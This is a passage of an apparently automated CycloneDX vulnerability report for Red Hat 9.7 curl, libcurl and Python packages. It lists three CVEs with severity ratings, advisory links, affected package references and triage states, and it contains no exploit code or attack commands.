          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-15079",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        297
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15079"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15079"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-7q9p-cx8r-rh2q"
        },
        {
          "url": "https://hackerone.com/reports/3477116"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15079"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-01-20T14:50:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2025-15224",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        287
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and asked to do\npublic key authentication, curl would wrongly still ask and authenticate using\na locally running SSH agent.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15224"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hccr-q52r-4w88"
        },
        {
          "url": "https://hackerone.com/reports/3480925"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-01-20T14:47:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-15282",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15282"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15282"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0"
        },
        {
          "url": "https://github.com/python/cpython/commit/34d76b00dabde81a793bd06dd8ecb057838c4b38"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f396ca9d7bbe2a50ea6b8c9b27c0082884d9f80"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ed11d3cd288e6b90196a15c5a825a45d318fe47"
        },
        {
          "url": "https://github.com/python/cpython/commit/a35ca3be5842505dab74dc0b90b89cde0405017a"
        },
        {
          "url": "https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f"
        },
        {
          "url": "https://github.com/python/cpython/issues/143925"
        },
        {
          "url": "https://github.com/python/cpython/pull/143926"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15282.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15282"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
